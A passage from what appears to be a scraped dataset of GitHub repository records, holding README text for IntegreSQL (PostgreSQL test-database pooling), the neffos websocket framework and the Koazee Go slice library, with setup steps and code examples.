test database from a template before running any test.
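As a quick aside, and purely as an illustration that is not part of IntegreSQL itself (the driver, connection string and database names below are assumptions), creating a test database from a template boils down to a single `CREATE DATABASE ... TEMPLATE ...` statement:\r\n\r\n```go\r\npackage main\r\n\r\nimport (\r\n\t\"database/sql\"\r\n\t\"fmt\"\r\n\t\"log\"\r\n\r\n\t// assumed PostgreSQL driver, used only to make this sketch runnable\r\n\t_ \"github.com/lib/pq\"\r\n)\r\n\r\nfunc main() {\r\n\t// Connect to the maintenance database (credentials are placeholders).\r\n\tdb, err := sql.Open(\"postgres\", \"postgres://postgres:secret@127.0.0.1:5432/postgres?sslmode=disable\")\r\n\tif err != nil {\r\n\t\tlog.Fatal(err)\r\n\t}\r\n\tdefer db.Close()\r\n\r\n\t// CREATE DATABASE does not accept bind parameters, so the (illustrative)\r\n\t// database names are interpolated into the statement directly.\r\n\tif _, err := db.Exec(fmt.Sprintf(\"CREATE DATABASE %s TEMPLATE %s\", \"test_db_001\", \"my_template_db\")); err != nil {\r\n\t\tlog.Fatal(err)\r\n\t}\r\n}\r\n```\r\n\r\nThis `CREATE DATABASE ... TEMPLATE` step is exactly what the template-based approaches described here rely on.\r\n\r\n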
Even though this is quite fast, could we do better?\r\n\r\n### Approach 3c: Isolation by cached templates and pool\r\n\r\n* Test runner starts\r\n* Check migrations/fixtures have changed (hash over all related files)\r\n * Yes\r\n * Recreate a PostgreSQL template database\r\n * Apply all migrations\r\n * Seed all fixtures\r\n * No, nothing has changed\r\n * Simply reuse the previous PostgreSQL template database\r\n* Create a pool of n PostgreSQL test databases from our already migrated/seeded template database\r\n* **Before each** test: \r\n * Select the first new PostgreSQL test database that is ready from the test pool\r\n* Utilizing your selected PostgreSQL test database from the test pool for each test:\r\n * **Run your test code** \r\n* **After each** test: \r\n * If there are still tests lefts to run add some additional PostgreSQL test databases from our already migrated/seeded template database\r\n* Test runner ends\r\n\r\nFinally, by keeping a warm pool of test database we arrive at the speed of Approach 0, while having the isolation gurantees of all subsequent approaches.\r\nThis is actually the (simplified) strategy, that we have used in [allaboutapps-backend-stack](https://github.com/allaboutapps/aaa-backend-stack) for many years.\r\n\r\n#### Approach 3c benchmark 1: Baseline\r\n\r\nHere's a quick benchmark of how this strategy typically performed back then:\r\n\r\n```\r\n--- -------------------------------- ---\r\n replicas switched: 50 avg=11ms min=1ms max=445ms\r\n replicas awaited: 1 prebuffer=8 avg=436ms max=436ms\r\n background replicas: 58 avg=272ms min=41ms max=474ms\r\n - warm up template (cold): 82% 2675ms\r\n * truncate: 62% 2032ms\r\n * migrate: 18% 594ms\r\n * seed: 1% 45ms\r\n - switching: 17% 571ms\r\n * disconnect: 1% 42ms\r\n * switch replica: 14% 470ms\r\n - resolve next: 1% 34ms\r\n - await next: 13% 436ms\r\n * reinitialize: 1% 57ms\r\n strategy related time: --- 3246ms\r\n vs total executed time: 20% 15538ms\r\n--- ------------------------------ ---\r\n```\r\n\r\nThis is a rather small testsuite with `50` tests and with a tiny database. Thus the whole test run was finished in `~15sec`. `~2.7sec` were spend setting up the template within the warm up (truncate + migrate + seed) and `~0.6sec` in total waiting for a new test/replica databases to become available for a test. We spend `~20%` of our total execution time running / waiting inside our test strategy approach. \r\n\r\nThis a cold start. You pay for this warm-up flow only if no template database was cached by a previous test run (if your migrations + fixtures files - the `hash` over these files - hasn't changed).\r\n\r\nA new test database (called a replica here) from this tiny template database took max. `~500ms` to create, on avg. this was ~halfed and most importantly can be done in the background (while some tests already execute).\r\n\r\nThe cool thing about having a warm pool of replicas setup in the background, is that selecting new replicas from the pool is blazingly fast, as typically they *will be already ready* when it's time to execute the next test. For instance, it took `~500ms` max. 
and **`11ms` on avg.** to select a new replica for all subsequent tests (we only had to wait once until a replica became available for usage within a test - typically it's the first test to be executed).\r\n\r\n#### Approach 3c benchmark 2: Small project\r\n\r\nLet's look at a sightly bigger testsuite and see how this approach may possibly scale:\r\n\r\n```\r\n--- ----------------------------------- ---\r\n replicas switched: 280 avg=26ms min=11ms max=447ms\r\n replicas awaited: 1 prebuffer=8 avg=417ms max=417ms\r\n background replicas: 288 avg=423ms min=105ms max=2574ms\r\n - warm up template (cold): 40% 5151ms\r\n * truncate: 8% 980ms\r\n * migrate: 26% 3360ms\r\n * seed: 4% 809ms\r\n - switching: 60% 7461ms\r\n * disconnect: 2% 322ms\r\n * switch replica: 6% 775ms\r\n - resolve next: 2% 358ms\r\n - await next: 3% 417ms\r\n * reinitialize: 50% 6364ms\r\n strategy related time: --- 12612ms\r\n vs total executed time: 11% 111094ms\r\n--- --------------------------------- ---\r\n```\r\n\r\nThis test suite is larger and comes with `280` tests, the whole test run finished in `~1m50s` (`~390ms` per test on avg.). `~5.2sec` were spend setting up the template and `~7.5sec` in total waiting for a new test / replica databases to become available for a test.\r\n\r\nThe rise in switching time is expected, as we need way more replicas / test databases this time, however we only spend `~11%` running / waiting inside our test strategy approach. To put that into perspective, each test only had to **wait `~26ms` on avg.** until it could finally execute (and typically, this is solely the time it needs to open up a new database connection).\r\n\r\nThis should hopefully give you some base understanding on why we consider this testing approach essential for our projects. It's the sweet combination of speed and isolation. \r\n\r\n### Final approach: IntegreSQL\r\n\r\nWe realized that having the above pool logic directly within the test runner is actually counterproductive and is further limiting usage from properly utilizing parallel testing (+performance).\r\n\r\nAs we switched to Go as our primary backend engineering language, we needed to rewrite the above logic anyways and decided to provide a safe and language agnostic way to utilize this testing strategy with PostgreSQL.\r\n\r\nIntegreSQL is a RESTful JSON API distributed as Docker image or go cli. It's language agnostic and manages multiple [PostgreSQL templates](https://supabase.io/blog/2020/07/09/postgresql-templates/) and their separate pool of test databases for your tests. 
It keeps the pool of test databases warm (as it's running in the background) and is fit for parallel test execution with multiple test runners / processes.\r\n\r\nOur flow now finally changed to this:\r\n\r\n* **Start IntegreSQL** and leave it running **in the background** (your PostgreSQL template and test database pool will always be warm)\r\n* ...\r\n* 1..n test runners start in parallel\r\n* Once per test runner process\r\n * Get migrations/fixtures files `hash` over all related database files\r\n * `InitializeTemplate: POST /templates`: attempt to create a new PostgreSQL template database identifying though the above hash `payload: {\"hash\": \"string\"}`\r\n * `StatusOK: 200` \r\n * Truncate\r\n * Apply all migrations\r\n * Seed all fixtures\r\n * `FinalizeTemplate: PUT /templates/{hash}` \r\n * If you encountered any template setup errors call `DiscardTemplate: DELETE /templates/{hash}`\r\n * `StatusLocked: 423`\r\n * Some other process has already recreated a PostgreSQL template database for this `hash` (or is currently doing it), you can just consider the template ready at this point.\r\n * `StatusServiceUnavailable: 503`\r\n * Typically happens if IntegreSQL cannot communicate with PostgreSQL, fail the test runner process\r\n* **Before each** test `GetTestDatabase: GET /templates/{hash}/tests`\r\n * Blocks until the template database is finalized (via `FinalizeTemplate`)\r\n * `StatusOK: 200`\r\n * You get a fully isolated PostgreSQL database from our already migrated/seeded template database to use within your test\r\n * `StatusNotFound: 404`\r\n * Well, seems like someone forgot to call `InitializeTemplate` or it errored out.\r\n * `StatusGone: 410`\r\n * There was an error during test setup with our fixtures, someone called `DiscardTemplate`, thus this template cannot be used.\r\n * `StatusServiceUnavailable: 503`\r\n * Well, typically a PostgreSQL connectivity problem\r\n* Utilizing the isolated PostgreSQL test database received from IntegreSQL for each (parallel) test:\r\n * **Run your test code**\r\n* **After each** test optional: `ReturnTestDatabase: DELETE /templates/{hash}/tests/{test-database-id}`\r\n * Marks the test database that it can be wiped early on pool limit overflow (or reused if `true` is submitted)\r\n* 1..n test runners end\r\n* ...\r\n* Subsequent 1..n test runners start/end in parallel and reuse the above logic\r\n\r\n#### Integrate by client lib\r\n\r\nThe flow above might look intimidating at first glance, but trust us, it's simple to integrate especially if there is already an client library available for your specific language. We currently have those:\r\n\r\n* Go: [integresql-client-go](https://github.com/allaboutapps/integresql-client-go) by [Nick M\u00fcller - @MorpheusXAUT](https://github.com/MorpheusXAUT)\r\n* Python: [integresql-client-python](https://github.com/msztolcman/integresql-client-python) by [Marcin Sztolcman - @msztolcman](https://github.com/msztolcman)\r\n* .NET: [IntegreSQL.EF](https://github.com/mcctomsk/IntegreSql.EF) by [Artur Drobinskiy - @Shaddix](https://github.com/Shaddix)\r\n* JavaScript/TypeScript: [@devoxa/integresql-client](https://github.com/devoxa/integresql-client) by [Devoxa - @devoxa](https://github.com/devoxa)\r\n* ... 
*Add your link here and make a PR*\r\n\r\n#### Integrate by RESTful JSON calls\r\n\r\nA really good starting point to write your own integresql-client for a specific language can be found [here (go code)](https://github.com/allaboutapps/integresql-client-go/blob/master/client.go) and [here (godoc)](https://pkg.go.dev/github.com/allaboutapps/integresql-client-go?tab=doc). It's just RESTful JSON after all.\r\n\r\n#### Demo\r\n\r\nIf you want to take a look on how we integrate IntegreSQL - \ud83e\udd2d - please just try our [go-starter](https://github.com/allaboutapps/go-starter) project or take a look at our [testing setup code](https://github.com/allaboutapps/go-starter/blob/master/internal/test/testing.go). \r\n\r\n## Install\r\n\r\n### Install using Docker (preferred)\r\n\r\nA minimal Docker image containing a pre-built `IntegreSQL` executable is available at [Docker Hub](https://hub.docker.com/r/allaboutapps/integresql).\r\n\r\n```bash\r\ndocker pull allaboutapps/integresql\r\n```\r\n\r\n### Install locally\r\n\r\nInstalling `IntegreSQL` locally requires a working [Go](https://golang.org/dl/) (1.14 or above) environment. Install the `IntegreSQL` executable to your Go bin folder:\r\n\r\n```bash\r\ngo get github.com/allaboutapps/integresql/cmd/server\r\n```\r\n\r\n## Configuration\r\n\r\n`IntegreSQL` requires little configuration, all of which has to be provided via environment variables (due to the intended usage in a Docker environment). The following settings are available:\r\n\r\n| Description | Environment variable | Default | Required |\r\n| ----------------------------------------------------------------- | ------------------------------------- | -------------------- | -------- |\r\n| IntegreSQL: listen address (defaults to all if empty) | `INTEGRESQL_ADDRESS` | `\"\"` | |\r\n| IntegreSQL: port | `INTEGRESQL_PORT` | `5000` | |\r\n| PostgreSQL: host | `INTEGRESQL_PGHOST`, `PGHOST` | `\"127.0.0.1\"` | Yes |\r\n| PostgreSQL: port | `INTEGRESQL_PGPORT`, `PGPORT` | `5432` | |\r\n| PostgreSQL: username | `INTEGRESQL_PGUSER`, `PGUSER`, `USER` | `\"postgres\"` | Yes |\r\n| PostgreSQL: password | `INTEGRESQL_PGPASSWORD`, `PGPASSWORD` | `\"\"` | Yes |\r\n| PostgreSQL: database for manager | `INTEGRESQL_PGDATABASE` | `\"postgres\"` | |\r\n| PostgreSQL: template database to use | `INTEGRESQL_ROOT_TEMPLATE` | `\"template0\"` | |\r\n| Managed databases: prefix | `INTEGRESQL_DB_PREFIX` | `\"integresql\"` | |\r\n| Managed *template* databases: prefix `integresql_template_` | `INTEGRESQL_TEMPLATE_DB_PREFIX` | `\"template\"` | |\r\n| Managed *test* databases: prefix `integresql_test__` | `INTEGRESQL_TEST_DB_PREFIX` | `\"test\"` | |\r\n| Managed *test* databases: username | `INTEGRESQL_TEST_PGUSER` | PostgreSQL: username | |\r\n| Managed *test* databases: password | `INTEGRESQL_TEST_PGPASSWORD` | PostgreSQL: password | |\r\n| Managed *test* databases: minimal test pool size | `INTEGRESQL_TEST_INITIAL_POOL_SIZE` | `10` | |\r\n| Managed *test* databases: maximal test pool size | `INTEGRESQL_TEST_MAX_POOL_SIZE` | `500` | |\r\n\r\n\r\n## Usage\r\n\r\n### Run using Docker (preferred)\r\n\r\nSimply start the `IntegreSQL` [Docker](https://docs.docker.com/install/) (19.03 or above) container, provide the required environment variables and expose the server port:\r\n\r\n```bash\r\ndocker run -d --name integresql -e INTEGRESQL_PORT=5000 -p 5000:5000 allaboutapps/integresql\r\n```\r\n\r\n`IntegreSQL` can also be included in your project via [Docker Compose](https://docs.docker.com/compose/install/) (1.25 or 
above):\r\n\r\n```yaml\r\nversion: \"3.4\"\r\nservices:\r\n\r\n # Your main service image\r\n service:\r\n depends_on:\r\n - postgres\r\n - integresql\r\n environment:\r\n PGDATABASE: &PGDATABASE \"development\"\r\n PGUSER: &PGUSER \"dbuser\"\r\n PGPASSWORD: &PGPASSWORD \"9bed16f749d74a3c8bfbced18a7647f5\"\r\n PGHOST: &PGHOST \"postgres\"\r\n PGPORT: &PGPORT \"5432\"\r\n PGSSLMODE: &PGSSLMODE \"disable\"\r\n\r\n # optional: env for integresql client testing\r\n # see https://github.com/allaboutapps/integresql-client-go\r\n # INTEGRESQL_CLIENT_BASE_URL: \"http://integresql:5000/api\"\r\n\r\n # [...] additional main service setup\r\n\r\n integresql:\r\n image: allaboutapps/integresql:1.0.0\r\n ports:\r\n - \"5000:5000\"\r\n depends_on:\r\n - postgres\r\n environment: \r\n PGHOST: *PGHOST\r\n PGUSER: *PGUSER\r\n PGPASSWORD: *PGPASSWORD\r\n\r\n postgres:\r\n image: postgres:12.2-alpine # should be the same version as used live\r\n # ATTENTION\r\n # fsync=off, synchronous_commit=off and full_page_writes=off\r\n # gives us a major speed up during local development and testing (~30%),\r\n # however you should NEVER use these settings in PRODUCTION unless\r\n # you want to have CORRUPTED data.\r\n # DO NOT COPY/PASTE THIS BLINDLY.\r\n # YOU HAVE BEEN WARNED.\r\n # Apply some performance improvements to pg as these guarantees are not needed while running locally\r\n command: \"postgres -c 'shared_buffers=128MB' -c 'fsync=off' -c 'synchronous_commit=off' -c 'full_page_writes=off' -c 'max_connections=100' -c 'client_min_messages=warning'\"\r\n expose:\r\n - \"5432\"\r\n ports:\r\n - \"5432:5432\"\r\n environment:\r\n POSTGRES_DB: *PGDATABASE\r\n POSTGRES_USER: *PGUSER\r\n POSTGRES_PASSWORD: *PGPASSWORD\r\n volumes:\r\n - pgvolume:/var/lib/postgresql/data\r\n\r\nvolumes:\r\n pgvolume: # declare a named volume to persist DB data\r\n```\r\n\r\nYou may also refer to our [go-starter `docker-compose.yml`](https://github.com/allaboutapps/go-starter/blob/master/docker-compose.yml).\r\n\r\n### Run locally\r\n\r\nRunning the `IntegreSQL` server locally requires configuration via exported environment variables (see below):\r\n\r\n```bash\r\nexport INTEGRESQL_PORT=5000\r\nexport PGHOST=127.0.0.1\r\nexport PGUSER=test\r\nexport PGPASSWORD=testpass\r\nintegresql\r\n```\r\n\r\n## Contributing\r\n\r\nPull requests are welcome. For major changes, please [open an issue](https://github.com/allaboutapps/integresql/issues/new) first to discuss what you would like to change.\r\n\r\nPlease make sure to update tests as appropriate.\r\n\r\n### Development setup\r\n\r\n`IntegreSQL` requires the following local setup for development:\r\n\r\n- [Docker CE](https://docs.docker.com/install/) (19.03 or above)\r\n- [Docker Compose](https://docs.docker.com/compose/install/) (1.25 or above)\r\n\r\nThe project makes use of the [devcontainer functionality](https://code.visualstudio.com/docs/remote/containers) provided by [Visual Studio Code](https://code.visualstudio.com/) so no local installation of a Go compiler is required when using VSCode as an IDE.\r\n\r\nShould you prefer to develop `IntegreSQL` without the Docker setup, please ensure a working [Go](https://golang.org/dl/) (1.14 or above) environment has been configured as well as a PostgreSQL instance is available (tested against version 12 or above, but *should* be compatible to lower versions) and the appropriate environment variables have been configured as described in the [Install](#install) section.\r\n\r\n### Development quickstart\r\n\r\n1. 
Start the local docker-compose setup and open an interactive shell in the development container:\r\n\r\n```bash\r\n# Build the development Docker container, start it and open a shell\r\n./docker-helper.sh --up\r\n```\r\n\r\n2. Initialize the project, downloading all dependencies and tools required (executed within the dev container):\r\n\r\n```bash\r\n# Init dependencies/tools\r\nmake init\r\n\r\n# Build executable (generate, format, build, vet)\r\nmake\r\n```\r\n\r\n3. Execute project tests and start server:\r\n\r\n```bash\r\n# Execute tests\r\nmake test\r\n\r\n# Run IntegreSQL server with config from environment\r\nintegresql\r\n```\r\n\r\n## Maintainers\r\n\r\n- [Nick M\u00fcller - @MorpheusXAUT](https://github.com/MorpheusXAUT)\r\n- [Mario Ranftl - @majodev](https://github.com/majodev)\r\n\r\n## License\r\n\r\n[MIT](LICENSE) \u00a9 2020 aaa \u2013 all about apps GmbH | Nick M\u00fcller | Mario Ranftl and the `IntegreSQL` project contributors\r\n", "readme_type": "markdown", "hn_comments": "The background section in the readme Is blank.. no real explanation of why someone might use this", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kataras/neffos", "link": "https://github.com/kataras/neffos", "tags": ["go", "websocket", "iris", "neffos", "golang"], "stars": 514, "description": "A modern, fast and scalable websocket framework with elegant API written in Go", "lang": "Go", "repo_lang": "", "readme": "\n\n[![neffos chat example](https://github.com/neffos-contrib/bootstrap-chat/raw/master/screenshot.png)](https://github.com/neffos-contrib/bootstrap-chat)\n\n[![build status](https://img.shields.io/github/actions/workflow/status/kataras/neffos/ci.yml?style=for-the-badge)](https://github.com/kataras/neffos/actions) [![report card](https://img.shields.io/badge/report%20card-a%2B-ff3333.svg?style=for-the-badge)](https://goreportcard.com/report/github.com/kataras/neffos) [![view examples](https://img.shields.io/badge/learn%20by-examples-0077b3.svg?style=for-the-badge)](https://github.com/kataras/neffos/tree/master/_examples) [![chat](https://img.shields.io/gitter/room/neffos-framework/community.svg?color=blue&logo=gitter&style=for-the-badge)](https://gitter.im/neffos-framework/community) [![frontend pkg](https://img.shields.io/badge/JS%20-client-BDB76B.svg?style=for-the-badge)](https://github.com/kataras/neffos.js)\n\n## About neffos\n\nNeffos is a cross-platform real-time framework with expressive, elegant API written in [Go](https://go.dev). Neffos takes the pain out of development by easing common tasks used in real-time backend and frontend applications such as:\n\n- Scale-out using redis or nats[*](_examples/scale-out)\n- Adaptive request upgradation and server dialing\n- Acknowledgements\n- Namespaces\n- Rooms\n- Broadcast\n- Event-Driven architecture\n- Request-Response architecture\n- Error Awareness\n- Asynchronous Broadcast\n- Timeouts\n- Encoding\n- Reconnection\n- Modern neffos API client for Browsers, Nodejs[*](https://github.com/kataras/neffos.js) and Go\n\n## Learning neffos\n\n
\nQick View\n\n## Server\n\n```go\nimport (\n // [...]\n \"github.com/kataras/neffos\"\n \"github.com/kataras/neffos/gorilla\"\n)\n\nfunc runServer() {\n events := make(neffos.Namespaces)\n events.On(\"/v1\", \"workday\", func(ns *neffos.NSConn, msg neffos.Message) error {\n date := string(msg.Body)\n\n t, err := time.Parse(\"01-02-2006\", date)\n if err != nil {\n if n := ns.Conn.Increment(\"tries\"); n >= 3 && n%3 == 0 {\n // Return custom error text to the client.\n return fmt.Errorf(\"Why not try this one? 06-24-2019\")\n } else if n >= 6 && n%2 == 0 {\n // Fire the \"notify\" client event.\n ns.Emit(\"notify\", []byte(\"What are you doing?\"))\n }\n // Return the parse error back to the client.\n return err\n }\n\n weekday := t.Weekday()\n\n if weekday == time.Saturday || weekday == time.Sunday {\n return neffos.Reply([]byte(\"day off\"))\n }\n\n // Reply back to the client.\n responseText := fmt.Sprintf(\"it's %s, do your job.\", weekday)\n return neffos.Reply([]byte(responseText))\n })\n\n websocketServer := neffos.New(gorilla.DefaultUpgrader, events)\n\n // Fire the \"/v1:notify\" event to all clients after server's 1 minute.\n time.AfterFunc(1*time.Minute, func() {\n websocketServer.Broadcast(nil, neffos.Message{\n Namespace: \"/v1\",\n Event: \"notify\",\n Body: []byte(\"server is up and running for 1 minute\"),\n })\n })\n\n router := http.NewServeMux()\n router.Handle(\"/\", websocketServer)\n\n log.Println(\"Serving websockets on localhost:8080\")\n log.Fatal(http.ListenAndServe(\":8080\", router))\n}\n```\n\n## Go Client\n\n```go\nfunc runClient() {\n ctx := context.TODO()\n events := make(neffos.Namespaces)\n events.On(\"/v1\", \"notify\", func(c *neffos.NSConn, msg neffos.Message) error {\n log.Printf(\"Server says: %s\\n\", string(msg.Body))\n return nil\n })\n\n // Connect to the server.\n client, err := neffos.Dial(ctx,\n gorilla.DefaultDialer,\n \"ws://localhost:8080\",\n events)\n if err != nil {\n panic(err)\n }\n\n // Connect to a namespace.\n c, err := client.Connect(ctx, \"/v1\")\n if err != nil {\n panic(err)\n }\n\n fmt.Println(\"Please specify a date of format: mm-dd-yyyy\")\n\n for {\n fmt.Print(\">> \")\n var date string\n fmt.Scanf(\"%s\", &date)\n\n // Send to the server and wait reply to this message.\n response, err := c.Ask(ctx, \"workday\", []byte(date))\n if err != nil {\n if neffos.IsCloseError(err) {\n // Check if the error is a close signal,\n // or make use of the `<- client.NotifyClose`\n // read-only channel instead.\n break\n }\n\n // >> 13-29-2019\n // error received: parsing time \"13-29-2019\": month out of range\n fmt.Printf(\"error received: %v\\n\", err)\n continue\n }\n\n // >> 06-29-2019\n // it's a day off!\n //\n // >> 06-24-2019\n // it's Monday, do your job.\n fmt.Println(string(response.Body))\n }\n}\n```\n\n## Javascript Client\n\nNavigate to: \n\n
\n\nNeffos contains extensive and thorough **[wiki](https://github.com/kataras/neffos/wiki)** making it easy to get started with the framework.\n\nFor a more detailed technical documentation you can head over to our [godocs](https://godoc.org/github.com/kataras/neffos). And for executable code you can always visit the [_examples](_examples/) repository's subdirectory.\n\n### Do you like to read while traveling?\n\nYou can [request](https://forms.gle/7jzLUEuSALc3b8u9A) a PDF version of the **E-Book** today and be participated in the development of neffos.\n\n[![https://iris-go.com/images/neffos-book-overview.png](https://iris-go.com/images/neffos-book-overview.png)](https://forms.gle/7jzLUEuSALc3b8u9A)\n\n## Contributing\n\nWe'd love to see your contribution to the neffos real-time framework! For more information about contributing to the neffos project please check the [CONTRIBUTING.md](CONTRIBUTING.md) file.\n\n- [neffos-contrib](https://github.com/neffos-contrib) github organisation for more programming languages support, please invite yourself.\n\n## Security Vulnerabilities\n\nIf you discover a security vulnerability within neffos, please send an e-mail to [neffos-go@outlook.com](mailto:neffos-go@outlook.com). All security vulnerabilities will be promptly addressed.\n\n## License\n\nThe word \"neffos\" has a greek origin and it is translated to \"cloud\" in English dictionary.\n\nThis project is licensed under the [MIT license](https://opensource.org/licenses/MIT).\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wesovilabs/koazee", "link": "https://github.com/wesovilabs/koazee", "tags": ["functional-programming", "lazy-evaluation", "golang-library", "golang", "immutable", "arrays", "slices"], "stars": 514, "description": "A StreamLike, Immutable, Lazy Loading and smart Golang Library to deal with slices.", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/wesovilabs/koazee.svg?branch=master)](https://travis-ci.org/wesovilabs/koazee)\n[![Go Report Card](https://goreportcard.com/badge/github.com/wesovilabs/koazee)](https://goreportcard.com/report/github.com/wesovilabs/koazee)\n[![godoc](https://godoc.org/github.com/wesovilabs/koazee?status.svg)](http://godoc.org/github.com/wesovilabs/koazee)\n[![codecov](https://codecov.io/gh/wesovilabs/koazee/branch/master/graph/badge.svg)](https://codecov.io/gh/wesovilabs/koazee)\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/avelino/awesome-go#Utilities)\n\n# Koazee\n\n> Lazy like a koala, smart like a chimpanzee\n\n\n## What is Koazee?\n\nKoazee is a StreamLike, Immutable, Lazy Loading and smart Golang Library to deal with\u00a0slices. 
\n\n\nVisit the [Koazee wiki](https://github.com/wesovilabs/koazee/wiki) to find out what Koazee can do.\n\n## Koazee Highlights\n\n- **Immutable**: Koazee won't modify your inputs.\u00a0\n- **StreamLike**: We can combine operations up our convenience.\u00a0\n- **Lazy loading**: Operations are not performed until they're required\n- **Generic**: Koazee provides a generic interface able to deal with slice of any type without creating custom functions.\n- **Focusing on performance**: First rule for implementing a new operation is providing the best possible performance.\n\n\n\n## Getting started\n\n### Installing\n> Add Koazee to your project\n\n**Go modules**\n\n```\nmodule github.com/me/project\nrequire ( \n github.com/wesovilabs/koazee vX.Y.Z\n)\n```\n\n**Glide**\n\n```\nglide get github.com/wesovilabs/koazee\n```\n\n**Go dep**\n\n```\ngo get github.com/wesovilabs/koazee\n```\n\n### Usage\n\n#### Stream creation\n\nLet's first obtain a stream from an existing array.\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tfmt.Printf(\"slice: %v\\n\", numbers)\n\tstream := koazee.StreamOf(numbers)\n\tfmt.Printf(\"stream: %v\\n\", stream.Out().Val())\n}\n\n/**\ngo run main.go\n\nslice: [1 5 4 3 2 7 1 8 2 3]\nstream: [1 5 4 3 2 7 1 8 2 3]\n*/\n```\n\n#### Stream operations\n\nCurrent release v0.0.3 (Gibbon) brings us 20 generic operations that are showed below\n\n##### stream.At / stream.First / stream.Last\nThese operations return an element from the stream\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tstream := koazee.StreamOf(numbers)\n\tfmt.Printf(\"stream.At(4): %d\\n\", stream.At(4).Int())\n\tfmt.Printf(\"stream.First: %d\\n\", stream.First().Int())\n\tfmt.Printf(\"stream.Last: %d\\n\", stream.Last().Int())\n}\n\n/**\ngo run main.go\n\nstream.At(4): 2\nstream.First: 1\nstream.Last: 3\n*/\n```\n\n##### stream.Add / stream.Drop / stream.DropWhile / stream.DeleteAt / stream.Pop / stream.Set\nThese operations add or delete elements from the stream.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", numbers)\n\n\tstream := koazee.StreamOf(numbers)\n\tfmt.Print(\"stream.Add(10): \")\n\tfmt.Println(stream.Add(10).Do().Out().Val())\n\n\tfmt.Print(\"stream.Drop(5): \")\n\tfmt.Println(stream.Drop(5).Do().Out().Val())\n\t\n\tfmt.Print(\"stream.DropWhile(val<=5): \")\n\tfmt.Println(stream.DropWhile(func(element int)bool{return element<=5}).Do().Out().Val())\n\n\tfmt.Print(\"stream.DeleteAt(4): \")\n\tfmt.Println(stream.DeleteAt(4).Do().Out().Val())\n\n\tfmt.Print(\"stream.Set(0,5): \")\n\tfmt.Println(stream.Set(0, 5).Do().Out().Val())\n\n\tfmt.Print(\"stream.Pop(): \")\n\tval, newStream := stream.Pop()\n\tfmt.Printf(\"%d ... \", val.Int())\n\tfmt.Println(newStream.Out().Val())\n\n}\n\n/**\ngo run main.go\n\ninput: [1 5 4 3 2 7 1 8 2 3]\nstream.Add(10): [1 5 4 3 2 7 1 8 2 3 10]\nstream.Drop(5): [1 4 3 2 7 1 8 2 3]\nstream.DropWhile(val<=5): [7 8]\nstream.DeleteAt(4): [1 5 4 3 7 1 8 2 3]\nstream.Set(0,5): [5 5 4 3 2 7 1 8 2 3]\nstream.Pop(): 1 ... 
[5 4 3 2 7 1 8 2 3]\n*/\n```\n\n##### tream.Count / stream.IndexOf / stream.IndexesOf / stream.LastIndexOf / stream.Contains\nThese operations return info from the elements in the stream\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", numbers)\n\tstream := koazee.StreamOf(numbers)\n\tcount, _ := stream.Count()\n\tfmt.Printf(\"stream.Count(): %d\\n\", count)\n\tindex, _ := stream.IndexOf(2)\n\tfmt.Printf(\"stream.IndexOf(2): %d\\n\", index)\n\tindexes, _ := stream.IndexesOf(2)\n fmt.Printf(\"stream.IndexesOf(2): %d\\n\", indexes)\n\tindex, _ = stream.LastIndexOf(2)\n\tfmt.Printf(\"stream.LastIndexOf(2): %d\\n\", index)\n\tcontains, _ := stream.Contains(7)\n\tfmt.Printf(\"stream.Contains(7): %v\\n\", contains)\n}\n\n/**\ngo run main.go\n\ninput: [1 5 4 3 2 7 1 8 2 3]\nstream.Count(): 10\nstream.IndexOf(2): 4\nstream.IndexesOf(2): [4 8]\nstream.LastIndexOf(2): 8\nstream.Contains(7): true\n*/\n```\n\n##### stream.Sort / stream.Reverse\nThese operations organize the elements in the stream.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n\t\"strings\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tfmt.Print(\"input: \")\n\tfmt.Println(animals)\n\tstream := koazee.StreamOf(animals)\n\n\tfmt.Print(\"stream.Reverse(): \")\n\tfmt.Println(stream.Reverse().Out().Val())\n\n\tfmt.Print(\"stream.Sort(strings.Compare): \")\n\tfmt.Println(stream.Sort(strings.Compare).Out().Val())\n\n}\n\n/**\ngo run main.go\n\ninput: [lynx dog cat monkey fox tiger lion]\nstream.Reverse(): [lion tiger fox monkey cat dog lynx]\nstream.Sort(strings.Compare): [cat dog fox lion lynx monkey tiger]\n*/\n```\n\n##### stream.Take / stream.Filter / stream.RemoveDuplicates\nThese operations return a filtered stream.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"dog\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tfmt.Print(\"input: \")\n\tfmt.Println(animals)\n\tstream := koazee.StreamOf(animals)\n\n\tfmt.Print(\"stream.Take(1,4): \")\n\tfmt.Println(stream.Take(1, 4).Out().Val())\n\n\tfmt.Print(\"stream.Filter(len==4): \")\n\tfmt.Println(stream.\n\t\tFilter(\n\t\t\tfunc(val string) bool {\n\t\t\t\treturn len(val) == 4\n\t\t\t}).\n\t\tOut().Val(),\n\t)\n\tfmt.Print(\"stream.RemoveDuplicates(): 